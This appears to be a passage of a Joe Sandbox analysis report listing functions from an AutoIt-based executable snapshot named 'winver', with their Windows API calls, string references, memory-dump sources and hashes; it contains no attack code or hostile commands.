LoadImageW.USER32(?,?,00000000,?,?,00007FF63D7912EF), ref: 00007FF63D7D9FAC
ExtractIconExW.SHELL32 ref: 00007FF63D7D9FCD
LoadImageW.USER32 ref: 00007FF63D7D9FEB
ExtractIconExW.SHELL32 ref: 00007FF63D7DA00C
SendMessageW.USER32 ref: 00007FF63D7DA02F
DestroyIcon.USER32 ref: 00007FF63D7DA03E
SendMessageW.USER32 ref: 00007FF63D7DA064
DestroyIcon.USER32 ref: 00007FF63D7DA073

Strings

P, xrefs: 00007FF63D7D9FD3

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: P
API String ID: 1268354404-3110715001
Opcode ID: 412959d0724f75b7d39851ae8659dcdf1696e07dd2a08cd1ae22a9d36a4ad5b0
Instruction ID: 74f91e1063195c565c785c9d52333ca5813986c0d39669760f7f8fa17823581a
Opcode Fuzzy Hash: 412959d0724f75b7d39851ae8659dcdf1696e07dd2a08cd1ae22a9d36a4ad5b0
Instruction Fuzzy Hash: 0461A336A086498AEB54DFA5D8416B927B1FF84BE8F144535EE0E83B94EF3CF444A740

Function 00007FF63D8146AC Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF63D814715
LoadStringW.USER32 ref: 00007FF63D814739
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D814893
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D8148AF

Strings

Line %d (File "%s"):, xrefs: 00007FF63D814788
"%s" (%d) : ==> %s:%s%s, xrefs: 00007FF63D81487A
"%s" (%d) : ==> %s:, xrefs: 00007FF63D8148A1
^ ERROR, xrefs: 00007FF63D814812
Error: , xrefs: 00007FF63D814843

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: LoadStringwprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 3297454147-2391861430
Opcode ID: 36b5fad6b053a7374659f15895733295218d4fb8ebdaad425095c247973fec86
Instruction ID: 3eaa4bf3dd3b5a937efa6843c8cb07c04bf401f8726fec1b527f59a72e013066
Opcode Fuzzy Hash: 36b5fad6b053a7374659f15895733295218d4fb8ebdaad425095c247973fec86
Instruction Fuzzy Hash: E7718132A28A9AA6EB10EBA5D8415ED6370FF40794F400132EA5D97799FF3CF50AD700

Function 00007FF63D7CDB04 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7CDC81

Strings

NAN(IND), xrefs: 00007FF63D7CDBAF
nan(snan), xrefs: 00007FF63D7CDBA4
INF, xrefs: 00007FF63D7CDB77
nan, xrefs: 00007FF63D7CDB6C
inf, xrefs: 00007FF63D7CDB8A
nan(ind), xrefs: 00007FF63D7CDBBA
NAN, xrefs: 00007FF63D7CDB65
NAN(SNAN), xrefs: 00007FF63D7CDB99

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 3d41b9cd17ab2ac661bfee36312a885a9b34c4e2511a3fe037f5faab9f5955a9
Instruction ID: d78a31309cd5df04ee6ffcf5def49fe7350a102dbb9227ee943cb4a8a74535c7
Opcode Fuzzy Hash: 3d41b9cd17ab2ac661bfee36312a885a9b34c4e2511a3fe037f5faab9f5955a9
Instruction Fuzzy Hash: 40418D72A09B4999E714CFA5E8517E937B8EB18398F00413AEE5C87B94EE3CE025D340

Function 00007FF63D808500 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000001,00007FF63D7F2470,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF63D7AD8CD), ref: 00007FF63D808536
LoadStringW.USER32 ref: 00007FF63D808550
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D808593
MessageBoxW.USER32 ref: 00007FF63D808627

Strings

Line %d (File "%s"):, xrefs: 00007FF63D8085BA
%s (%d) : ==> %s.: %s %s, xrefs: 00007FF63D80857D
., xrefs: 00007FF63D808604
Line %d:, xrefs: 00007FF63D8085A9
Error: , xrefs: 00007FF63D8085E6

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: HandleLoadMessageModuleStringwprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 4007322891-4153970271
Opcode ID: 0835d4ae959b0e85bc27e33e9ea8fabff2fbbac1d86b55f118aed74d16e42c45
Instruction ID: fe123d73db63a8232852356ecff114890d5226749ff22082e67d423695ba5c3b
Opcode Fuzzy Hash: 0835d4ae959b0e85bc27e33e9ea8fabff2fbbac1d86b55f118aed74d16e42c45
Instruction Fuzzy Hash: A3316032A28A8A95DB10EFA1E4415ED6374FF84B94F804132EA4D87799EF3CF545D740

Function 00007FF63D842190 Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

PostMessageW.USER32 ref: 00007FF63D842202
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF63D842213
GetDlgCtrlID.USER32 ref: 00007FF63D842220
GetMenuItemInfoW.USER32 ref: 00007FF63D842357
GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF63D842375
GetMenuItemID.USER32 ref: 00007FF63D84238A
GetMenuItemInfoW.USER32 ref: 00007FF63D8423C5
GetMenuItemInfoW.USER32 ref: 00007FF63D842410
CheckMenuRadioItem.USER32 ref: 00007FF63D842447

Part of subcall function 00007FF63D840F3C: IsWindow.USER32 ref: 00007FF63D841001
Part of subcall function 00007FF63D840F3C: IsWindowEnabled.USER32 ref: 00007FF63D84100E

DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF63D84247E

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
String ID:
API String ID: 2672075419-0
Opcode ID: 4cff660e8758b8e9bd441a6aacd911bdbb08a2228a101f0cf70a6b4cd5d9312d
Instruction ID: d1b558a0bfe51e1600e6228b29f43f46de93a53d6958b5bd3dbc196c340c1c19
Opcode Fuzzy Hash: 4cff660e8758b8e9bd441a6aacd911bdbb08a2228a101f0cf70a6b4cd5d9312d
Instruction Fuzzy Hash: A1916A36B1865A8AEB60CFA5D4807BD23B9FB45B88F540035DE0D97B99EE38F545E300

Function 00007FF63D79D578 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 437COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7ADD28: CreateFileW.KERNEL32 ref: 00007FF63D7ADD92

Part of subcall function 00007FF63D7B4A20: GetCurrentDirectoryW.KERNEL32(?,00007FF63D79D61B), ref: 00007FF63D7B4A3C

Part of subcall function 00007FF63D7AE5B4: GetFullPathNameW.KERNEL32(?,00007FF63D7AE5A1,?,00007FF63D79BB08,?,?,?,00007FF63D79109E), ref: 00007FF63D7AE5DF

SetCurrentDirectoryW.KERNEL32 ref: 00007FF63D79D6B4
SetCurrentDirectoryW.KERNEL32 ref: 00007FF63D79D7FE

Part of subcall function 00007FF63D796EE0: wcscpy.LIBCMT ref: 00007FF63D796F31

Strings

Bad directive syntax error, xrefs: 00007FF63D7E9A64
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00007FF63D7E96EA
AU3!, xrefs: 00007FF63D79D663
Error opening the file, xrefs: 00007FF63D7E970B, 00007FF63D7E9A91
EA06, xrefs: 00007FF63D7E972B
Unterminated string, xrefs: 00007FF63D7E9AEC

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2207129308-3738523708
Opcode ID: 6735691426c86ab2cddcc0dae57895742cea5efa9e76b548158a7cb24a5e5b4f
Instruction ID: 856211cb24fcf6d5db2e78c3b7bc821511ab18446c1227eac089f1fac31008cc
Opcode Fuzzy Hash: 6735691426c86ab2cddcc0dae57895742cea5efa9e76b548158a7cb24a5e5b4f
Instruction Fuzzy Hash: D012B173A1864A85EB10EBA5D4511FD6370FB84794F801132EA8E87B9AEF7CF545E700

Function 00007FF63D841F38 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

Part of subcall function 00007FF63D791990: GetCursorPos.USER32 ref: 00007FF63D7919BF
Part of subcall function 00007FF63D791990: ScreenToClient.USER32 ref: 00007FF63D7919DE
Part of subcall function 00007FF63D791990: GetAsyncKeyState.USER32 ref: 00007FF63D791A06
Part of subcall function 00007FF63D791990: GetAsyncKeyState.USER32 ref: 00007FF63D791A26

ImageList_DragLeave.COMCTL32 ref: 00007FF63D841FB8
ImageList_EndDrag.COMCTL32 ref: 00007FF63D841FBE
ReleaseCapture.USER32 ref: 00007FF63D841FC4
SetWindowTextW.USER32 ref: 00007FF63D842072
SendMessageW.USER32 ref: 00007FF63D842087

Strings

@GUI_DRAGFILE, xrefs: 00007FF63D8420F4
@GUI_DROPID, xrefs: 00007FF63D8420AD

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 3721556410-2107944366
Opcode ID: e4c97fe40200ce9e9b6d9ba2b992ae612b4041737ab3bf4e0828f3d69286b371
Instruction ID: a7f5d701731da39896fbea90fb6b54147df0a801a7c384ade02e20eed23d8f02
Opcode Fuzzy Hash: e4c97fe40200ce9e9b6d9ba2b992ae612b4041737ab3bf4e0828f3d69286b371
Instruction Fuzzy Hash: 4A619E32A14A5A85EB00EFA5E8816ED3775FB44B98F400132EE0D93BA5EF38F549D340

Function 00007FF63D80AEF8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF63D80AFB7
IsMenu.USER32 ref: 00007FF63D80AFD9
CreatePopupMenu.USER32 ref: 00007FF63D80B00B
GetMenuItemCount.USER32 ref: 00007FF63D80B065
InsertMenuItemW.USER32 ref: 00007FF63D80B091

Strings

2, xrefs: 00007FF63D80AFEF
P, xrefs: 00007FF63D80AF58

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 2$P
API String ID: 93392585-1110268094
Opcode ID: c5b05919853fbb28769e9965582cc3fabc8c0796622091e0681504d1b096713a
Instruction ID: 3e388cdf8530ed2762f0ada34c1b9fe0f69d142d945d7f4df27b07babc473c66
Opcode Fuzzy Hash: c5b05919853fbb28769e9965582cc3fabc8c0796622091e0681504d1b096713a
Instruction Fuzzy Hash: 8551F032A06A4699F7218FA9D4406BD37A5FF047DCF248135CA6A93794EF39F4859700

Function 00007FF63D80BC1C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7B9428: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7B944F

LoadIconW.USER32 ref: 00007FF63D80BCD8

Strings

stop, xrefs: 00007FF63D80BCA4
blank, xrefs: 00007FF63D80BC51
question, xrefs: 00007FF63D80BC8A
warning, xrefs: 00007FF63D80BCBE
info, xrefs: 00007FF63D80BC70

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: IconLoad_invalid_parameter_noinfo
String ID: blank$info$question$stop$warning
API String ID: 4060274358-404129466
Opcode ID: 2cf5de46c4b923c34e2d30cf4c6169cc589c3c1b0d0b33f25e26c52ee32e73a5
Instruction ID: 488b17909d06dbfeb09f1e2af79a0a44732aec86ad2aa4add8d90efe455f31e4
Opcode Fuzzy Hash: 2cf5de46c4b923c34e2d30cf4c6169cc589c3c1b0d0b33f25e26c52ee32e73a5
Instruction Fuzzy Hash: F8217F21B1D78BA1FB169B9AA9001BA6261BF44BD8F445031DE0DC6795FF7CF442E640

Function 00007FF63D80D460 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF63D80D474
LoadStringW.USER32 ref: 00007FF63D80D48A
GetModuleHandleW.KERNEL32 ref: 00007FF63D80D492
LoadStringW.USER32 ref: 00007FF63D80D4AE
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D80D4E1
MessageBoxW.USER32 ref: 00007FF63D80D4FD

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00007FF63D80D4DA

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: HandleLoadModuleString$Messagewprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4051287042-3128320259
Opcode ID: ea439ebd739cb59e962d27a3b747818675a2e324064776f594ee22011d09cd6b
Instruction ID: 8b1ceafca6af954a73fc977ade440cf427acd295f26d8caa4c2e924cace7a8c9
Opcode Fuzzy Hash: ea439ebd739cb59e962d27a3b747818675a2e324064776f594ee22011d09cd6b
Instruction Fuzzy Hash: 5E116571B19B8991D7309F50F4417EA6764FB48744F800436DA4E83B54EF7CE149D740

Function 00007FF63D843750 Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

GetSystemMetrics.USER32 ref: 00007FF63D8437B9
GetSystemMetrics.USER32 ref: 00007FF63D8437D8
MoveWindow.USER32 ref: 00007FF63D843A0D
SendMessageW.USER32 ref: 00007FF63D843A2E
SendMessageW.USER32 ref: 00007FF63D843A52
ShowWindow.USER32 ref: 00007FF63D843A72
InvalidateRect.USER32(?,?,?,00000000,?,?,?,00007FF63D7DA9A2), ref: 00007FF63D843A9F
DefDlgProcW.USER32(?,?,?,00000000,?,?,?,00007FF63D7DA9A2), ref: 00007FF63D843AC7

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 068a482b696e659b7718e902b8f4020e4eeec0207fca9c0ff6fd4b76f20b63f6
Instruction ID: ad3080396e1b68ab4f574332af76af07de6f37ebf0d00f33a4faf69435554a2f
Opcode Fuzzy Hash: 068a482b696e659b7718e902b8f4020e4eeec0207fca9c0ff6fd4b76f20b63f6
Instruction Fuzzy Hash: 97A11522F5968B42EB68DFA6D1447797AB9FB44B84F505035DE4A83B90EF3CF8509300

Function 00007FF63D7B4ADC Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF63D7B4B6D
ShowWindow.USER32 ref: 00007FF63D7FB61D
ShowWindow.USER32 ref: 00007FF63D7FB6B7

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 62df9cd00b9937c1691da0874a94e84758bf20c8dd1b88af987fd87fa59a4973
Instruction ID: c072057811ddf0849fa7d046666b22c0eedb037ff8fbfd40df1aa1d5220984a2
Opcode Fuzzy Hash: 62df9cd00b9937c1691da0874a94e84758bf20c8dd1b88af987fd87fa59a4973
Instruction Fuzzy Hash: DD51A031E0C18A88FB659BB9945837E27B9EF81B4CF184075C60EC27D9EE3CB484E641

Function 00007FF63D811A6C Relevance: 10.7, APIs: 7, Instructions: 248COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32 ref: 00007FF63D811B57
SafeArrayAccessData.OLEAUT32 ref: 00007FF63D811BAD
SafeArrayAccessData.OLEAUT32 ref: 00007FF63D811C94
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF63D811CBB
SafeArrayAccessData.OLEAUT32 ref: 00007FF63D811CCC
SafeArrayAccessData.OLEAUT32 ref: 00007FF63D811D3A
SafeArrayAccessData.OLEAUT32 ref: 00007FF63D811DAF

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: af03c4cee68f3b353b0255d13d4ca3bcd8cc7b64d3c9f22a0a239787e11bdfd2
Instruction ID: b1bcd8a8c4d39e8d1c7458ddbf5df148aba2b4f7296cecb9a1c607d04b695358
Opcode Fuzzy Hash: af03c4cee68f3b353b0255d13d4ca3bcd8cc7b64d3c9f22a0a239787e11bdfd2
Instruction Fuzzy Hash: 32A17662E08A1A96FB549BA5C4943BC27A0EB44B84F154431DA2ED7785FF7CF84DE340

Function 00007FF63D791DA4 Relevance: 10.7, APIs: 7, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d9c80677a1d8d48d397783391999504707cc9c812ea95279664ef606c6a488f6
Instruction ID: 0279c5feafcd199c04ddc098015d1cfef4865b3d6e4a197e501f8c11f94ee6f5
Opcode Fuzzy Hash: d9c80677a1d8d48d397783391999504707cc9c812ea95279664ef606c6a488f6
Instruction Fuzzy Hash: 50A1CE72A086C487D7708F59A4006AEBBB5FB85BC8F144129EA8953B69DF3CE456DF00

Function 00007FF63D840F3C Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 00007FF63D841001
IsWindowEnabled.USER32 ref: 00007FF63D84100E
SendMessageW.USER32 ref: 00007FF63D841136
SendMessageW.USER32 ref: 00007FF63D84123E

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: MessageSendWindow$Enabled
String ID:
API String ID: 3694350264-0
Opcode ID: ceebaf329e80c6ba1ad742ac2904a66636075a8bd3394094560204d141505c58
Instruction ID: 855ad67f7cc7439220d3f8ee9e71401fb219c311d3fc53dadc9c6e4fa4c8a2d8
Opcode Fuzzy Hash: ceebaf329e80c6ba1ad742ac2904a66636075a8bd3394094560204d141505c58
Instruction Fuzzy Hash: 9791AD21E5868E86FB649B96D4503BA73BDAF44B84F084132CA4DC3791EF3DF499A300

